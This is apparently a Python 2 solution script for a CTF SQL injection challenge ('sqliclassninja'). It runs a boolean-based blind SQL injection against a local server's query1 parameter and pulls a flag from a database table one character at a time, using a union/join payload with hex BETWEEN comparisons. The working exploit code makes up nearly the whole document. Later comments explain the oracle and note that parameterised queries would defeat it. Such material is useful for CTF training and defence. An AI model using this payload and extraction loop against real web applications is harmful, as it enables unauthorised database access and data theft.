
@ducnhse130201
Created January 10, 2019 12:17
solve_sqliclassninja
import requests
def query(q):
    """Return True when the challenge page answers *q* with exactly four 'Success' markers.

    *q* is appended verbatim to the ``query1`` parameter of the local
    challenge instance on port 7002; no URL-encoding is applied here, so the
    caller supplies any percent-escapes (such as ``%0a``) itself.

    The response body is the only signal used: a 'Success' count of four is
    treated as "condition true", anything else as "condition false".
    NOTE(review): why four is the "true" count is not visible in this file --
    presumably the page prints one marker per check it runs; confirm against
    the challenge source.
    """
    session = requests.Session()
    response = session.get('http://localhost:7002/?query1=' + q)
    # The comparison already yields a bool, so it is returned directly.
    return response.text.count('Success') == 4
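# --> select 1 from dual#
# (author's note; presumably the statement the payload below is appended to --
# confirm against the challenge source)

# Character-by-character recovery of one row of `the_awes0me_flag`, using
# query() as a true/false oracle.  Each probe asks whether hex(value) lies
# between hex(prefix + c) and hex(prefix + next c); a "true" answer fixes c as
# the next character.
#
# Defender's reading: the probes only work because the endpoint splices the
# `query1` parameter into its SQL text and lets the page content differ with
# the outcome.  Binding the parameter instead of concatenating it removes the
# oracle.  On the wire this shows up as long runs of near-identical requests
# that differ in a single hex byte.
#
# Written for Python 2: str.encode('hex') does not exist on Python 3.
table = ''
while True:
    for i in range(33, 128):
        low = '0x' + (table + chr(i)).encode('hex')
        high = '0x' + (table + chr(i + 1)).encode('hex')
        q = ('%0a where (select hex (b) from (select * from (select 1 as a)a'
             ' join (select 2 as b)b union select * from the_awes0me_flag'
             ' limit 1 offset 1)aa) between hex (' + low + ') and hex (' + high + ');')
        if query(q):
            table += chr(i)
            print(table)
            break
    else:
        # No candidate in 33..127 matched, so the value is complete (or holds a
        # character outside that range).  The original looped forever here,
        # re-sending the same 95 requests; stop instead.
        break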